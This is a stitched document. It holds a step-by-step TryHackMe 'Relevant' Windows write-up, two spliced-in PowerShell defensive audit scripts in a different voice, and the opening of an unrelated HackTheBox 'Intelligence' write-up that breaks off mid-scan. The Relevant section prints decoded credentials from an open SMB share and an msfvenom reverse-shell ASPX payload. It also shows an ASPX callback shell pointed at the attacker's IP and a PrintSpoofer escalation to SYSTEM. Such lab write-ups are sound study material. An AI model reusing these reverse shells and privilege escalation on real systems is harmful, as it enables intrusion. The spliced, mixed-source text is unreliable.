thm-relevant

Relevant Writeup

Relevant is a medium-rated Windows room on TryHackMe by TheMayor. The contents of an SMB share that anyone can access are reflected by a web server; this is used to get a shell on the box as the IIS user, and SeImpersonatePrivilege is then abused to get a SYSTEM shell.

Port Scan

All Port

local@local:~/Documents/tryhackme/relevant$ nmap -p- --max-retries 0 --min-rate 3000 -oN allports 10.10.95.250
Warning: 10.10.95.250 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.10.95.250
Host is up (0.39s latency).
Not shown: 65529 filtered ports
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
49663/tcp open  unknown

# Nmap done at Fri Oct 23 15:08:54 2020 -- 1 IP address (1 host up) scanned in 34.12 seconds

Detailed Scan for top 1000 ports

local@local:~/Documents/tryhackme/relevant$ nmap -sC -sV -oN initial 10.10.34.139
Nmap scan report for 10.10.34.139
Host is up (0.48s latency).
Not shown: 995 filtered ports
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: RELEVANT
|   NetBIOS_Domain_Name: RELEVANT
|   NetBIOS_Computer_Name: RELEVANT
|   DNS_Domain_Name: Relevant
|   DNS_Computer_Name: Relevant
|   Product_Version: 10.0.14393
|_  System_Time: 2020-09-21T04:45:02+00:00
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2020-07-24T23:16:08
|_Not valid after:  2021-01-23T23:16:08
|_ssl-date: 2020-09-21T04:45:41+00:00; -1s from scanner time.
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h23m59s, deviation: 3h07m51s, median: -1s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
|   Computer name: Relevant
|   NetBIOS computer name: RELEVANT\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-09-20T21:45:03-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-09-21T04:45:02
|_  start_date: 2020-09-21T04:39:55

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Sep 21 10:30:42 2020 -- 1 IP address (1 host up) scanned in 96.97 seconds

There are a lot of ports open, so let's start the enumeration with SMB.

SMB service on Port 445

Trying Null authentication

smbmap without username and password

┌──(kali㉿puckie)-[~/thm/relevant]
└─$ smbmap -H 10.10.3.20 
[!] Authentication error on 10.10.3.20

smbmap with username and password

┌──(kali㉿puckie)-[~/thm/relevant]
└─$ smbmap -H 10.10.3.20 -u anonymous -p anonymous 
[+] Guest session IP: 10.10.3.20:445 Name: 10.10.3.20 
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        nt4wrksv                                                READ, WRITE

┌──(kali㉿puckie)-[~/thm/relevant]

I always try the smbmap to list the shares because along with the share names, it also shows the permissions.

Null authentication using smbclient

┌──(kali㉿puckie)-[~/thm/relevant]
└─$ smbclient -L 10.10.3.20 1 
Enter WORKGROUP\kali's password:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        nt4wrksv        Disk
SMB1 disabled -- no workgroup available

┌──(kali㉿puckie)-[~/thm/relevant]

I have found smbclient to be the most reliable for listing shares, but it does not show the read/write permissions for the current user. Here ADMIN$, C$ and IPC$ are the default administrative shares, and the only non-default one is the nt4wrksv share.

Trying to connect to each shares

local@local:~/Documents/tryhackme/relevant$ smbclient -N  \\\\10.10.240.19\\ADMIN$
tree connect failed: NT_STATUS_ACCESS_DENIED
local@local:~/Documents/tryhackme/relevant$ smbclient -N  \\\\10.10.240.19\\C$
tree connect failed: NT_STATUS_ACCESS_DENIED
local@local:~/Documents/tryhackme/relevant$ smbclient -N  \\\\10.10.240.19\\IPC$
Try "help" to get a list of possible commands.
smb: \> dir
NT_STATUS_INVALID_INFO_CLASS listing \*
smb: \> exit
local@local:~/Documents/tryhackme/relevant$ smbclient -N  \\\\10.10.240.19\\nt4wrksv
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sun Jul 26 03:31:04 2020
  ..                                  D        0  Sun Jul 26 03:31:04 2020
  passwords.txt                       A       98  Sat Jul 25 21:00:33 2020

                7735807 blocks of size 4096. 4934467 blocks available
smb: \> get passwords.txt

Looking at the results, we can connect to two shares, i.e. IPC$ and nt4wrksv, but not to the other two, because we don't have enough permission. We do have enough permission over the share nt4wrksv, and we can see a file called passwords.txt. We can mount the share on our machine, which makes it easier to work with.

Mounting the share on local device

local@local:~/Documents/tryhackme/relevant$ mkdir mnt
local@local:~/Documents/tryhackme/relevant$ sudo mount -t cifs //10.10.240.19/nt4wrksv mnt
Password for root@//10.10.240.19/nt4wrksv:                          
local@local:~/Documents/tryhackme/relevant$ ls -la mnt/
total 9
drwxr-xr-x 2 root     root     4096 Jul 26 03:31 .
drwxr-xr-x 5 local local 4096 Nov 13 09:36 ..
-rwxr-xr-x 1 root     root       98 Jul 25 21:00 passwords.txt

In this case we have mounted the share on our machine. We could also have simply downloaded the file using get passwords.txt from inside the smb shell.

Content of passwords.txt

local@local:~/Documents/tryhackme/relevant$ cat passwords.txt 
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk

Decoded Content

Bob:!P@$$W0rD!123
Bill:Juw4nnaM4n420696969!$$$

We get a couple of usernames and passwords. So let's check whether the credentials are valid.

Using crackmapexec

local@local:~/Documents/tryhackme/relevant$ cat user 
Bob
Bill

local@local:~/Documents/tryhackme/relevant$ cat password
!P@$$W0rD!123
Juw4nnaM4n420696969!$$$
local@local:~/Documents/tryhackme/relevant$ crackmapexec smb 10.10.240.19 -u user -p password
SMB         10.10.240.19    445    RELEVANT         [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:RELEVANT) (domain:Relevant) (signing:False) (SMBv1:True)
SMB         10.10.240.19    445    RELEVANT         [+] Relevant\Bob:!P@$$W0rD!123

CME shows that the credentials for Bob are valid. So let's list the shares as user Bob.

Listing shares using CME for user Bob

local@local:~/Documents/tryhackme/relevant$ crackmapexec smb 10.10.240.19 -u user -p password --shares
SMB         10.10.240.19    445    RELEVANT         [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:RELEVANT) (domain:Relevant) (signing:False) (SMBv1:True)
SMB         10.10.240.19    445    RELEVANT         [+] Relevant\Bob:!P@$$W0rD!123 
SMB         10.10.240.19    445    RELEVANT         [+] Enumerated shares
SMB         10.10.240.19    445    RELEVANT         Share           Permissions     Remark
SMB         10.10.240.19    445    RELEVANT         -----           -----------     ------
SMB         10.10.240.19    445    RELEVANT         ADMIN$                          Remote Admin
SMB         10.10.240.19    445    RELEVANT         C$                              Default share
SMB         10.10.240.19    445    RELEVANT         IPC$                            Remote IPC
SMB         10.10.240.19    445    RELEVANT         nt4wrksv        READ,WRITE

Looks like we have write permission on the share nt4wrksv. But it is not over yet. If I specify a user that definitely does not exist, like this_user_doesnot_exist, the output of CME is the following.

Listing shares for user this_user_doesnot_exist

local@local:~/Documents/tryhackme/relevant$ crackmapexec smb 10.10.240.19 -u 'this_doesnot_exists' -p 'this_doesnot_exist' --shares
SMB         10.10.240.19    445    RELEVANT         [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:RELEVANT) (domain:Relevant) (signing:False) (SMBv1:True)
SMB         10.10.240.19    445    RELEVANT         [+] Relevant\this_doesnot_exists:this_doesnot_exist 
SMB         10.10.240.19    445    RELEVANT         [+] Enumerated shares
SMB         10.10.240.19    445    RELEVANT         Share           Permissions     Remark
SMB         10.10.240.19    445    RELEVANT         -----           -----------     ------
SMB         10.10.240.19    445    RELEVANT         ADMIN$                          Remote Admin
SMB         10.10.240.19    445    RELEVANT         C$                              Default share
SMB         10.10.240.19    445    RELEVANT         IPC$                            Remote IPC
SMB         10.10.240.19    445    RELEVANT         nt4wrksv        READ,WRITE 

CME tells us that this is a valid credential and lists the shares for us, but this user cannot exist, and even if it did, the password could not be the one we provided. What CME actually did was fall back to anonymous (guest) authentication for the user that does not exist. It did, however, tell us that the password for one of our users is incorrect, so that user (Bill) might be a valid user on the box. Since we have write permission on this share, if there is any chance the content of the share is reflected on the webserver, we can put an ASPX shell on the share and get code execution, just as on Linux we would upload a PHP shell.

Checking the HTTP service on Port 80


Directory Bruteforcing

local@local:~/Documents/tryhackme/relevant$ wfuzz -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/raft-medium-directories-lowercase.txt --hc 404 -t 50 http://10.10.126.3/FUZZ
********************************************************
* Wfuzz 3.0.3 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.126.3/FUZZ
Total requests: 26584

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

000003809:   200        31 L     55 W     703 Ch      "http://10.10.126.3/"
000013715:   400        6 L      26 W     324 Ch      ".."
000017472:   400        6 L      26 W     324 Ch      ".."
000026015:   400        6 L      26 W     324 Ch      "."

But I found nothing. So I checked manually whether the file passwords.txt or the directory nt4wrksv exists.

local@local:~/Documents/tryhackme/relevant$ curl http://10.10.126.3/nt4wrksv -i
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Fri, 13 Nov 2020 04:26:10 GMT
Content-Length: 0

local@local:~/Documents/tryhackme/relevant$ curl http://10.10.126.3/passwords.txt -i
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Fri, 13 Nov 2020 04:26:19 GMT
Content-Length: 0

And we get a 404.

Looking at the nmap all ports result we also have a port listening on 49663.

Checking port 49663

It turned out that this port is also running an HTTP service, so I ran wfuzz against it as well.

Directory Bruteforcing

local@local:~/Documents/tryhackme/relevant$ wfuzz -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/raft-medium-directories-lowercase.txt --hc 404 -t 50 http://10.10.126.3:49663/FUZZ
********************************************************
* Wfuzz 3.0.3 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.126.3:49663/FUZZ
Total requests: 26584

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                                                        
===================================================================

000000056:   301        1 L      10 W     162 Ch      "aspnet_client"                                                                                                
000003809:   200        31 L     55 W     703 Ch      "http://10.10.126.3:49663/"                                                                                    
000013715:   400        6 L      26 W     324 Ch      ".."                                                                                                           
000017472:   400        6 L      26 W     324 Ch      ".."                                                                                                           
000026015:   400        6 L      26 W     324 Ch      "."                                                                                                            

Total time: 639.9951
Processed Requests: 26533
Filtered Requests: 26528
Requests/sec.: 41.45812

This time we find a new directory, but with a little searching I found that aspnet_client is a folder for “resources which must be served via HTTP, but are installed on a per-server basis, rather than a per-application basis”. So it did not seem like something the user might have created.

So the next step would be to check if the contents of the SMB service are reflected.

local@local:~/Documents/tryhackme/relevant$ curl http://10.10.126.3:49663/passwords.txt -i
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Fri, 13 Nov 2020 04:33:27 GMT
Content-Length: 0
local@local:~/Documents/tryhackme/relevant$ curl http://10.10.126.3:49663/nt4wrksv/ -i
HTTP/1.1 200 OK
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Fri, 13 Nov 2020 04:34:21 GMT
Content-Length: 0

We get a 404 for the file passwords.txt but a 200 OK for the directory. This is exactly what we are looking for.

Checking for the file inside the SMB share

local@local:~/Documents/tryhackme/relevant$ curl http://10.10.126.3:49663/nt4wrksv/passwords.txt
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk

Now that we know the content of the SMB share is reflected on the webserver, and we have write permission on that share, let's copy an ASPX shell onto the mounted share.
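The defender-side counterpart of the check above: an added example (my own code, not from the writeup or any project) in PowerShell that lists every SMB share whose folder lies under an IIS site, application or virtual directory, and who can write to it through the share ACL. It assumes an elevated session on the IIS host with the SmbShare and WebAdministration modules available; the function names are my own.

```powershell
# Added example (not from the writeup): find SMB shares whose folder is served
# by IIS, so that anything written through SMB becomes web-reachable (and, if it
# is .aspx, executable). Run elevated on the IIS host.
# Assumes the SmbShare (Server 2012+) and WebAdministration modules.
Import-Module WebAdministration -ErrorAction Stop

function Get-WebServedPaths {
    # Every physical folder IIS serves: site roots, applications, virtual dirs.
    $out = @()
    foreach ($site in Get-Website) {
        $out += [pscustomobject]@{ Site = $site.Name; Url = '/'; Path = $site.PhysicalPath }
        foreach ($app in @(Get-WebApplication -Site $site.Name)) {
            $out += [pscustomobject]@{ Site = $site.Name; Url = $app.Path; Path = $app.PhysicalPath }
        }
        foreach ($vd in @(Get-WebVirtualDirectory -Site $site.Name)) {
            $out += [pscustomobject]@{ Site = $site.Name; Url = $vd.Path; Path = $vd.PhysicalPath }
        }
    }
    foreach ($p in $out) {
        # Site roots are often stored as %SystemDrive%\inetpub\wwwroot.
        $p.Path = [Environment]::ExpandEnvironmentVariables($p.Path).TrimEnd('\')
    }
    return $out
}

function Test-PathUnder([string]$Child, [string]$Parent) {
    $c = $Child.TrimEnd('\') + '\'
    $p = $Parent.TrimEnd('\') + '\'
    return $c.StartsWith($p, [System.StringComparison]::OrdinalIgnoreCase)
}

function Find-WebWritableShares {
    $web = Get-WebServedPaths
    foreach ($share in Get-SmbShare | Where-Object { $_.Path -and -not $_.Special }) {
        # Share-level ACL only; NTFS permissions can restrict further, never widen.
        $writers = @(Get-SmbShareAccess -Name $share.Name |
            Where-Object { $_.AccessControlType -eq 'Allow' -and $_.AccessRight -in @('Change', 'Full') })
        # Everyone, Guests or ANONYMOUS LOGON with write is the nt4wrksv situation.
        $open = @($writers | Where-Object { $_.AccountName -match '(^|\\)(Everyone|Guests?|ANONYMOUS LOGON)$' })
        foreach ($w in $web) {
            if (-not (Test-PathUnder $share.Path $w.Path)) { continue }
            $rel = $share.Path.TrimEnd('\').Substring($w.Path.Length).TrimStart('\') -replace '\\', '/'
            [pscustomobject]@{
                Share          = $share.Name
                SharePath      = $share.Path
                Site           = $w.Site
                WebUrl         = ($w.Url.TrimEnd('/') + '/' + $rel).TrimEnd('/') + '/'
                Writers        = ($writers.AccountName -join ', ')
                AnonymousWrite = [bool]$open.Count
            }
        }
    }
}

# Report; on a hit, cut anonymous write on the share, e.g.
#   Revoke-SmbShareAccess -Name nt4wrksv -AccountName Everyone -Force
Find-WebWritableShares | Format-Table -AutoSize
```

On a host configured like this box, the report shows the share under a site root with Everyone holding Change or Full, which is the condition that turns a file upload into code execution.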

Shell as IIS

┌──(kali㉿puckie)-[~/thm/relevant]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.9.2.244 LPORT=53 -f aspx -o pwn.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of aspx file: 3444 bytes
Saved as: pwn.aspx

┌──(kali㉿puckie)-[~/thm/relevant]

Aspx shell

local@local:~/Documents/tryhackme/relevant$ cp /opt/aspx-reverse-shell/shell.aspx shell.aspx

You can find plenty of ASPX shells on the internet.

Changing the content of the shell

local@local:~/Documents/tryhackme/relevant$ ifconfig tun0 | grep -i 'inet ' | awk -F " " '{print $2}'
10.6.31.213

Changed content

    protected void Page_Load(object sender, EventArgs e)
    {
        String host = "10.6.31.213"; // CHANGE THIS
        int port = 9001;             // CHANGE THIS

        CallbackShell(host, port);
    }

We have changed the contents to our IP and the port that we will be listening on.

Netcat listener on port 9001

local@local:~/Documents/tryhackme/relevant$ rlwrap nc -nvlp 9001
Listening on 0.0.0.0 9001

And notice something different here. I am using rlwrap, which can be installed from apt. On Linux the returned shell would not have autocompletion or arrow-key functionality, so we used to upgrade to an interactive shell using python or socat. Here, using rlwrap, we get the arrow-key functionality only.

Copying the shell inside mnt

local@local:~/Documents/tryhackme/relevant$ sudo cp shell.aspx mnt/shell.aspx
[sudo] password for local: 
local@local:~/Documents/tryhackme/relevant$ ls -la mnt
total 25
drwxr-xr-x 2 root     root      4096 Nov 13 10:31 .
drwxr-xr-x 5 local local  4096 Nov 13 10:26 ..
-rwxr-xr-x 1 root     root        98 Jul 25 21:00 passwords.txt
-rwxr-xr-x 1 root     root     15970 Nov 13 10:31 shell.aspx

Visiting the shell.aspx

local@local:~/Documents/tryhackme/relevant$ curl http://10.10.126.3:49663/nt4wrksv/shell.aspx

We do not get any output, but if we check the netcat listener, we get a shell back.

local@local:~/Documents/tryhackme/relevant$ rlwrap nc -nvlp 9001
Listening on 0.0.0.0 9001
Connection received on 10.10.126.3 49838
Spawn Shell...
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool

Here we are running as the IIS user, which is a service account on the Windows box, similar to www-data on a Linux box. As we have a shell as IIS, we can read the content of the inetpub directory, which contains the content of the webserver. inetpub can be thought of as the /var/www/html of a Linux system.

Privilege Escalation

The first thing I do on Linux is check the sudoers entries using sudo -l; on Windows we first check the privileges assigned to the user we are running as. Since we are running as IIS, it is likely that the service account has more privileges than a normal user account. Privileges, when enabled, allow a low-privileged user to perform certain privileged operations.

Listing privileges using whoami /priv

c:\inetpub>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

We can see that a few of the privileges are enabled for our user, and we can use SeImpersonatePrivilege to get a shell as nt authority\system. If you are having a hard time with privilege escalation on Windows, you could work through windows10privesc by Tib3rius and windowsprivescarena by TCM.
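To see the same privilege from the administrator's side, here is an added PowerShell example (my own code, not from the writeup or any project) that reports which principals are granted SeImpersonatePrivilege on the host and which IIS application pools run under identities that hold it by default. It assumes an elevated session with the WebAdministration module; secedit.exe ships with Windows, and the function names are my own.

```powershell
# Added example (not from the writeup): report who holds SeImpersonatePrivilege
# on this host and which IIS application pools run under identities that get it
# by default. Run elevated; secedit.exe ships with Windows and the IIS:\ drive
# comes from the WebAdministration module.
Import-Module WebAdministration -ErrorAction Stop

function Get-PrivilegeHolders {
    param([string]$Privilege = 'SeImpersonatePrivilege')
    # secedit writes the effective user-rights assignment as an INF line such as
    #   SeImpersonatePrivilege = *S-1-5-32-544,*S-1-5-6,*S-1-5-19,*S-1-5-20,*S-1-5-32-568
    $inf = Join-Path $env:TEMP 'user_rights.inf'
    & secedit.exe /export /cfg $inf /areas USER_RIGHTS | Out-Null
    $line = Get-Content $inf | Where-Object { $_ -match "^\s*$Privilege\s*=" } | Select-Object -First 1
    Remove-Item $inf -ErrorAction SilentlyContinue
    if (-not $line) { return @() }
    $sids = ($line -split '=', 2)[1] -split ',' | ForEach-Object { $_.Trim().TrimStart('*') }
    foreach ($sid in $sids) {
        # Resolve each SID to a name; well-known SIDs always resolve locally.
        $account = try {
            (New-Object System.Security.Principal.SecurityIdentifier $sid).Translate(
                [System.Security.Principal.NTAccount]).Value
        } catch { '(unresolved)' }
        [pscustomobject]@{ Sid = $sid; Account = $account }
    }
}

function Get-AppPoolIdentities {
    # LocalSystem, LocalService, NetworkService and ApplicationPoolIdentity (through
    # the IIS_IUSRS group) hold SeImpersonatePrivilege out of the box; that is the
    # privilege the DefaultAppPool shell above showed as Enabled.
    $builtIn = 'LocalSystem', 'LocalService', 'NetworkService', 'ApplicationPoolIdentity'
    foreach ($pool in Get-ChildItem IIS:\AppPools) {
        $type = [string]$pool.processModel.identityType
        $user = ''
        if ($type -eq 'SpecificUser') { $user = $pool.processModel.userName }
        [pscustomobject]@{
            AppPool            = $pool.Name
            IdentityType       = $type
            User               = $user
            DefaultImpersonate = ($type -in $builtIn)
        }
    }
}

Write-Host 'Principals granted SeImpersonatePrivilege:'
Get-PrivilegeHolders | Format-Table -AutoSize
Write-Host 'IIS application pool identities:'
Get-AppPoolIdentities | Format-Table -AutoSize
```

The privilege cannot simply be stripped from IIS without breaking authentication features, so the practical takeaway is to treat any web shell running under these identities as a SYSTEM compromise and to keep the share and upload paths locked down instead.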

Getting a system shell

So I will be using PrintSpoofer to get a system shell.

Downloading PrintSpoofer from GitHub

local@local:~/Documents/tryhackme/relevant$ wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe -O PrintSpoofer.exe
--2020-11-13 10:56:35--  https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
Resolving github.com (github.com)... 13.250.177.223
Connecting to github.com (github.com)|13.250.177.223|:443... connected.
HTTP request sent, awaiting response... 302 Found
HTTP request sent, awaiting response... 200 OK
Length: 27136 (26K) [application/octet-stream]
Saving to: ‘PrintSpoofer.exe’

PrintSpoofer.exe                            100%[===========================================================================================>]  26.50K   109KB/s    in 0.2s    

2020-11-13 10:56:37 (109 KB/s) - ‘PrintSpoofer.exe’ saved [27136/27136]

Let's upload this file differently, using smbclient.

local@local:~/Documents/tryhackme/relevant$ smbclient -N \\\\10.10.184.223\\nt4wrksv
Try "help" to get a list of possible commands.
smb: \> put PrintSpoofer.exe
putting file PrintSpoofer.exe as \PrintSpoofer.exe (19.2 kb/s) (average 15.1 kb/s)
smb: \> 

Listing the content

c:\inetpub\wwwroot>dir                   
dir                                                                                     
 Volume in drive C has no label.                                                        
 Volume Serial Number is AC3C-5CB5                             
 Directory of c:\inetpub\wwwroot\nt4wrksv

11/12/2020  10:09 PM    <DIR>          .
11/12/2020  10:09 PM    <DIR>          ..
07/25/2020  07:15 AM                98 passwords.txt
11/12/2020  10:09 PM            27,136 PrintSpoofer.exe
11/12/2020  10:08 PM            15,970 shell.aspx
               3 File(s)         43,204 bytes
               2 Dir(s)  20,269,436,928 bytes free

Execution on the windows box

c:\inetpub\wwwroot\nt4wrksv>PrintSpoofer.exe -i -c cmd
PrintSpoofer.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

And now we are nt authority\system.

Reading the root flag

C:\Windows\system32>cd \users\administrator\desktop
cd \users\administrator\desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is AC3C-5CB5

 Directory of C:\Users\Administrator\Desktop

07/25/2020  07:24 AM    <DIR>          .
07/25/2020  07:24 AM    <DIR>          ..
07/25/2020  07:25 AM                35 root.txt
               1 File(s)             35 bytes
               2 Dir(s)  20,269,117,440 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
THM{1fk5kf****************45pv}


htb-intelligence-nl

Enumeration

NMAP

# Nmap scan as: nmap -A -v -T4 -Pn -oN intial.nmap intelligence.htb
Increasing send delay for 10.129.80.199 from 0 to 5 due to 25 out of 61 dropped probes since last increase.
adjust_timeouts2: packet supposedly had rtt of 10052524 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 10052524 microseconds.  Ignoring time.
Increasing send delay for 10.129.80.199 from 5 to 10 due to 14 out of 34 dropped probes since last increase.
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Nmap scan report for intelligence.htb (10.129.80.199)
Host is up (0.57s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-07-05 13:18:02Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Issuer: commonName=intelligence-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-04-19T00:43:16
| Not valid after:  2022-04-19T00:43:16
| MD5:   7767 9533 67fb d65d 6065 dff7 7ad8 3e88
|_SHA-1: 1555 29d9 fef8 1aec 41b7 dab2 84d7 0f9d 30c7 bde7
|_ssl-date: 2021-07-05T13:19:42+00:00; +6h59m58s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Issuer: commonName=intelligence-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-04-19T00:43:16
| Not valid after:  2022-04-19T00:43:16
| MD5:   7767 9533 67fb d65d 6065 dff7 7ad8 3e88
|_SHA-1: 1555 29d9 fef8 1aec 41b7 dab2 84d7 0f9d 30c7 bde7
|_ssl-date: 2021-07-05T13:19:43+00:00; +6h59m57s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Issuer: commonName=intelligence-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-04-19T00:43:16
| Not valid after:  2022-04-19T00:43:16
| MD5:   7767 9533 67fb d65d 6065 dff7 7ad8 3e88
|_SHA-1: 1555 29d9 fef8 1aec 41b7 dab2 84d7 0f9d 30c7 bde7
|_ssl-date: 2021-07-05T13:19:42+00:00; +6h59m57s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Issuer: commonName=intelligence-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-04-19T00:43:16
| Not valid after:  2022-04-19T00:43:16
| MD5:   7767 9533 67fb d65d 6065 dff7 7ad8 3e88
|_SHA-1: 1555 29d9 fef8 1aec 41b7 dab2 84d7 0f9d 30c7 bde7
|_ssl-date: 2021-07-05T13:19:43+00:00; +6h59m57s from scanner time.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h59m56s, deviation: 0s, median: 6h59m56s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-07-05T13:19:08
|_  start_date: N/A

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   825.63 ms 10.10.14.1
2   829.73 ms intelligence.htb (10.129.80.199)

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap Scan done  -- 1 IP address (1 host up) scanned in 383.99 seconds

Looks like a normal Active Directory setup on Windows.

SMB

Enum4linux

Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) 

 ========================== 
|    Target Information    |
 ========================== 
Target ........... intelligence.htb
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ======================================================== 
|    Enumerating Workgroup/Domain on intelligence.htb    |
 ======================================================== 
[E] Can't find workgroup/domain


 ================================================ 
|    Nbtstat Information for intelligence.htb    |
 ================================================ 
Looking up status of 10.129.80.199
No reply from 10.129.80.199

 ========================================= 
|    Session Check on intelligence.htb    |
